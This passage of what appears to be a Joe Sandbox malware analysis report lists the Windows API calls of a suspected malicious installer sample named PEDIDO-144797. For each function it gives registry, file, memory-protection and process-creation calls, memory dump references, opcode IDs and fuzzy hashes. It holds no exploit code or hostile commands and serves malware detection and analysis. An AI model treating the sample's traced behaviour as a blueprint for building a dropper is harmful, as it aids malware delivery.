                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                          • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                                          • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                                                                                                          • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                                          • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                                                                                                          Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                                                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                                                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                                                                                          Function 0040624B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Create
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                          • Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
                                                                                                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                          • Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
                                                                                                                                          Function 00405F54 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F853,0040CED0,004033C2,0040CED0,0040F853,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                          • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                                                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                          • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                                                                                                          Function 00405F25 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                          • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                                                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                          • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                                                                                                          Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                                                                          Function 0040621D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Open
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                          • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                          • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                                                                                                          Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                                                                                                          • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                                                                                                          • Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                                                                                                          • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                                                                                                          Function 00403441 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                          Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                            • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                            • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                                                                            • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                                                                                            • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                                                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2972824698-0
                                                                                                                                          • Opcode ID: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                                                                                                          • Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
                                                                                                                                          • Opcode Fuzzy Hash: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                                                                                                          • Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
                                                                                                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Sleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                          • Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                                                                                                          • Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
                                                                                                                                          • Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                                                                                                          • Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D
                                                                                                                                          Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004055FD
                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                                                                                            • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405728
